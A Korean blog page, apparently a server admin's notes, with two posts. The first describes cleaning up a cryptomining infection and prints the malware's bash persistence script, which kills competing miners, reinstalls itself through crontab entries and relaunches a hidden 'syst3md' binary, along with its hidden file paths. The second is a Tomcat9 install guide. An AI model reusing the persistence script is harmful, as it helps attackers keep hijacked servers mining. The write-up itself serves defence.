반응형

 

프로세스 파악은 기본이니 생략

파악 되었으면, 포트 확인하고, 네트워크 포트 부터 막는다.

 

경험상 web을 통해 소스를 받고, ps가 죽으면 web에서 다시 소스를 받아서 설치하거나, 소스 삭제를 못 하게 해놓는다.

당장 마이닝허브 포트 부터 차단하면 로드 상승은 멈추게 된다.

다시 시작 및 체크는 cron으로 돌리는 것이고 cron도 삭제를 못 하게 해놓았다.

돌리는 소스를 최종적으로 파악 한 내용은 아래와 같다.

#!/bin/bash  sleeptime=5  killminers() {     pkill obama1     pkill playstation  
  pkill xmrig ?pkill java     pkill cnrig }  hook1location=`cat /var/tmp/.apachee/.hook1location` apachelogslocation=`cat /var/tmp/.apachee/.apachelogslocation` 
while : do ?killminers  ?if ! crontab -l | grep -q 'cronstart'; ?then ?
?rm -rf .tempo ??echo "* * * * * ${hook1location} > /dev/null <&1 2>&1 & disown" >> .tempo ??sleep 1 ??echo "@monthly ${hook1location} > /dev/null <&1 2>&1 &
 disown" >> .tempo ??sleep 1 ??echo "@reboot ${apachelogslocation} > /dev/null <&1 2>&1 & disown" >> .tempo ??crontab .tempo ??rm -rf .tempo ?fi ? ?if !
 pgrep -x syst3md > /dev/null ?then ??$hook1location > /dev/null <&1 2>&1 &
 disown ?fi  ?sleep $sleeptime done  ./apachelogs

 

/var/tmp/.apachee
/usr/bin/.ICE-unix/.k/.auth/syst3md
/tmp/.ICE-unix/.k/.auth/syst3md

 

다 찾아서 없앴다.

ㅋㅋ

 

댐벼라~

반응형

'server eng > Hacking' 카테고리의 다른 글

ubuntu 20.04 tomcat9 install 톰캣 설치!  (0) 2023.06.10
반응형

 

tomcat 설치

sudo apt install tomcat9 tomcat9-admin

 

tomcat 활성화

sudo systemctl enable tomcat9

 

tomcat 관리자 설정

vi /etc/tomcat9/tomcat-users.xml

<role rolename="admin-gui"/>

<role rolename="manager-gui"/>

<user username="admin" password="password" roles="admin-gui,manager-gui"/>

admin, password는 원하시는 것으로 넣으세요!

 

톰캣 리스타트!

sudo systemctl restart tomcat9

 

서버:8080 포트로 접속해본다.

되지롱~ apache 랑 tomcat proxyrevers 설정하고 java로 간단한 게임을 서비스 해보자!

반응형

'server eng > Hacking' 카테고리의 다른 글

마이닝 해킹  (0) 2024.04.14

+ Recent posts